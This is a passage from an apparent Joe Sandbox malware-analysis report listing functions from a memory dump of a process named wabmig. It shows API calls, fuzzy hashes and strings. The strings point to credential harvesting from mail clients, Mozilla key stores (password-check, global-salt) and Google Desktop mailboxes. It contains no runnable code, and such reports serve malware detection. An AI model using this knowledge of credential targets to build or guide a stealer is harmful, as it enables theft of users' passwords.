                                                                            • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                            • String ID:
                                                                            • API String ID: 3974772901-0
                                                                            • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                            • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                            • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                            • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                            Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcslen.MSVCRT ref: 0044406C
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                            • strlen.MSVCRT ref: 004440D1
                                                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                            • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                            • String ID:
                                                                            • API String ID: 577244452-0
                                                                            • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                                            • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                            • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                                            • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                            Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C02D
                                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                            • API String ID: 2726666094-3614832568
                                                                            • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                            • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                            Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                            • String ID:
                                                                            • API String ID: 2014771361-0
                                                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                            • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                            Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                              • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                            • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                            • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                            • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp$memcpy
                                                                            • String ID: global-salt$password-check
                                                                            • API String ID: 231171946-3927197501
                                                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                            • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                            Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                            • memset.MSVCRT ref: 0040330B
                                                                            • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                            • strchr.MSVCRT ref: 0040335A
                                                                              • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                            • strlen.MSVCRT ref: 0040339C
                                                                              • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                            • String ID: Personalities
                                                                            • API String ID: 2103853322-4287407858
                                                                            • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                            • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                            • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                            • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                            Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 004090C2
                                                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                            • String ID:
                                                                            • API String ID: 4247780290-0
                                                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                            • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                            Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _strcmpi.MSVCRT ref: 0040E134
                                                                            • _strcmpi.MSVCRT ref: 0040E14D
                                                                            • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi$_mbscpy
                                                                            • String ID: smtp
                                                                            • API String ID: 2625860049-60245459
                                                                            • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                            • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                            Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                            • memset.MSVCRT ref: 00408258
                                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                            Strings
                                                                            • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Close$EnumOpenmemset
                                                                            • String ID: Software\Google\Google Desktop\Mailboxes
                                                                            • API String ID: 2255314230-2212045309
                                                                            • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                            • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                            • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                            • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                            Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C28C
                                                                            • SetFocus.USER32(?,?), ref: 0040C314
                                                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FocusMessagePostmemset
                                                                            • String ID: S_@$l
                                                                            • API String ID: 3436799508-4018740455
                                                                            • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                            • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                            • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                            • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                            Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004092C0
                                                                            • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                            • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                            Strings
                                                                            • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString_mbscpymemset
                                                                            • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                            • API String ID: 408644273-3424043681
                                                                            • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                            • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                            • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                            • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                            Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                            • String ID: MS Sans Serif
                                                                            • API String ID: 3492281209-168460110
                                                                            • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                            • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                            • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                            • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                            Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_strcmpimemset
                                                                            • String ID: edit
                                                                            • API String ID: 275601554-2167791130
                                                                            • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                            • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                            • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                            • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                            Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$memset
                                                                            • String ID:
                                                                            • API String ID: 1860491036-0
                                                                            • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                            • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                            • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                            • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                            Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040D2C2
                                                                            • memset.MSVCRT ref: 0040D2D8
                                                                            • memset.MSVCRT ref: 0040D2EA
                                                                            • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                            • memset.MSVCRT ref: 0040D319
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$memcpy
                                                                            • String ID:
                                                                            • API String ID: 368790112-0
                                                                            • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                            • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                            • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                            • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                            Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                            • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: @
                                                                            • API String ID: 3510742995-2766056989
                                                                            • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                            • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                            • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                            • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                            Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi
                                                                            • String ID: C@$mail.identity
                                                                            • API String ID: 1439213657-721921413
                                                                            • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                            • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                            • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                            • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                            Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                            • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                            Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _ultoasprintf
                                                                            • String ID: %s %s %s
                                                                            • API String ID: 432394123-3850900253
                                                                            • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                            • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                            • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                            • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                            Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                                                            • sprintf.MSVCRT ref: 0040909B
                                                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
